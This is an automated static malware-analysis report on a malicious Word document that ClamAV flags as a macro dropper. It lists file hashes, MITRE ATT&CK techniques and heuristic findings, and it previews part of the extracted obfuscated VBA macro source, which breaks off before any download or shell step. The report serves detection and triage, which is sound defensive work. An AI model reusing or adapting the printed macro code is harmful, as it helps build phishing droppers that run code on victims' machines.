Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 632dec8befbd923f…

MALICIOUS

Office (OLE)

Size: 275.5 KB
Created: 2018-03-01 07:54:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 863bad6a3c7e788baefa529ef8e59afb
SHA-1: 491bfe8297671a8e4e45b3b8136951e6ada5cfbb
SHA-256: 632dec8befbd923f2f4236289f029bbde199089fca40cd26207e9052e6f10f20
Risk Score: 204

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is an OLE document containing a VBA macro with an AutoOpen procedure, a common technique for executing code automatically when the document is opened. The macro uses a Shell() call, indicating an attempt to run external commands or fetch additional payloads. ClamAV also identified the file as 'Doc.Dropper.Agent-6460587-0', further confirming its role as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6460587-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6460587-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   87320 bytes
SHA-256: 23f00df91f0e8bc3d794f0a0a75c3e220e86634a1ac9599afc4ac14fc7ae212a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VSILdiRaTHJk"
Sub wZqVTYsXDo()
   On Error Resume Next
   While kwCEblBdllU < NdfTH
      Set LQEvfzkiT = cWNSicajfMziFf
      riXcrnFkCsXboR = 1088230 + Round(wRDAPYCY) - 7188732 * Cos(558748) / nuWdKYznTNBbKX + Chr(KaGBlPasCQCi)
      SbwrooRqfPM = rdmHv / tddNcSkQjNBT
   Wend
   Select Case ItOUrOK
      Case 7470027
         GvfLuwuln = HbIBGFzjHYED
         MCDJdJvskCXX = 6492295
      Case 6677903
         YlWwZPLl = sHPri
         ORCGS = Rnd(1634494)
      Case 8105010
         RcstWYliYWiI = Atn(4105523)
         FiZBR = Fix(695592 + 3266449 * 4086875 * DJhnFUbQIhwEW)
   End Select
   For WoMPNjsIahM = 2245272 To jRrmYwioj
      kfJwGaaYzjwD = 2432363 - oDmAu
      Select Case AbuwuzRvYHn
         Case 8653948
            zbkDmmiAIPbb = ChrW(EmwUKhtAoJ - CSng(NCGIiAqvDQNc))
            zzOLj = LSURufzDzGzmK
         Case 3478094
            qkjaVHZjYMrJtV = ChrB(ThQzzSs)
            LdhzspEiCKFJ = 3018397
      End Select
      lNjmmwEDVDh = Sitn - 7381200
      For RVMUjwzUwoKj = UiowoMvlwCOKj To 9244529
         IHdPGBmIpqY = (2140380 * 3162263 + oZZGvcV * Sin(XOVrBVS - CDbl(JzBSLpKuZohawH) * 3029130 * iXHdp) / 834068 * CLng(7190842 - CDate(KtkPuPzR)) / rhZJzCzPijGv + 9090789 / (PzUMiNpJ / OiISE - AKpPkHaqrhVHNK / Int(4493232 - Round(YPcUQZCVDz) + 6496568 / 5465210)))
      Next
   Next
End Sub
Function CdwwIoaoiK()
On Error Resume Next
FXSjVVWiz = "hrEIqPcJFHpEhTptDjkzUWLZPJTYaM&eh=%5rav% sAwi"
WTKCzYn = mFNrijMU = (1573857 * 3420887 + jMJoGWmtt * Sin(bdpFhZOCGb - CDbl(rTjOKZWDlMaW) * 7294871 * iYKFM) / 2175022 * CLng(5506042 - CDate(sLcXmBJwSBpk)) / saavzPqIOBGE + 89364 / (BEzuQ / CbYmnm - tmtYhBQlz / Int(6884150 - Round(OvmfdJ) + 4214538 / 3663680)))
zzqzzcQJu = wIuUHZamRCoI = (1999472 * 8918009 + VVcZCkQEUofVXX * Sin(OQUBXlsYRHaiUu - CDbl(AEAqKIhwQBhDZj) * 5349265 * DOToY) / 7635647 * CLng(1776402 - CDate(KcwLRcGwJ)) / naUhNpjTE + 9947640 / (hTspEWPBFXNvd / hLWinvluAtA - WBdIEjJhcJE / Int(4180167 - Round(FquEBaf) + 8173951 / 266485)))
ibnZLMZ = iuivbdfghnkjgyugjn(FXSjVVWiz, 5, 11)
MNwpBuOMi = "ROGKqzij% tes&&!%1zssMiowzuAEAGYY"
UOZIBikEZk = DWLdFHDqYb = (6810799 * 7172665 + YlnIzsi * Sin(XcRPVnQFzv - CDbl(JkXOOqkr) * 499967 * TnVYiEXrnNS) / 9479962 * CLng(9526091 - CDate(uuNkUmkYfOb)) / BXZSMBbvEp + 9213991 / (ritOMiBMnrTUc / XQwuH - wADzSV / Int(134041 - Round(VBbEwWsl) + 8572729 / 4141150)))
BrKdzqjbilz = zNPqJDE = (7961433 * 2377963 + LwJhpurfuw * Sin(hjqlQOVGIlXdi - CDbl(thKtvN) * 6143642 * nKFRWJbBFwZV) / 3067214 * CLng(5680957 - CDate(FtojiEsnT)) / YwNjmwjKtv + 6178234 / (wrMfGjZENtP / EAHizj - XlqwMOUTApKWhs / Int(4830478 - Round(wWCzLOONijEcl) + 8287083 / 971167)))
jEUnDruEVp = iuivbdfghnkjgyugjn(MNwpBuOMi, 16, 15)
HZBSRHd = "LsbJjziwbqodsptvPnnXBXL% tes&&s=%4rav%qb"
bkkjCKFKUDz = kzdnqbTkwsNc = (6257461 * 5964283 + QvzMPk * Sin(AqCaUtkC - CDbl(tTTtVq) * 7077750 * iiNHCwzjipP) / 7104674 * CLng(73139 - CDate(vATwm)) / QHZzvlTINlmZ + 2021995 / (ilXJzsFt / EURHsXTZYEzQ - ENLRioTtC / Int(7994369 - Round(jSJcJwufWS) + 4167976 / 5939072)))
IVpjhw = iakuMOVKDL = (6416461 * 2030221 + jNRavBfraaOqPZ * Sin(UtEiih - CDbl(DDYhnTPdHcRL) * 3556338 * OwWTzmDAWDw) / 7934911 * CLng(2316554 - CDate(KGwcRtJNBONLb)) / TlZEGcGwiOiujD + 6360623 / (kwHZSAdpt / XAuHFnLGh - irijjNYktWJF / Int(6191630 - Round(iPDBiSHjKhF) + 1118259 / 331747)))
PHuDnLSi = iuivbdfghnkjgyugjn(HZBSRHd, 3, 15)
LQcooZ = "SKnCnmtoofDDHYjHhQiDmQirqtIYdt"
YsUapm = BWOURqAl = (8307001 * 1863334 + ihmhuQFHDhcLi * Sin(fjfAjknSmZcT - CDbl(XbfSdKnaclW) * 2043668 * YKDlZ) / 2015848 * CLng(6963286 - CDate(lKUkHYEPuME)) / iijYPwBqLC + 9057194 / (phMdPB / RjzlQ - hWljKiY / Int(3373569 - Round(TpifVbJuWiP) + 2320620 / 8954693)))
WCGKJL = MbAtMnqizP = (2593207 * 6554080 + PHAUWrFOXz * Sin(fYIpdCBwnvZ - CDbl(K
... (truncated)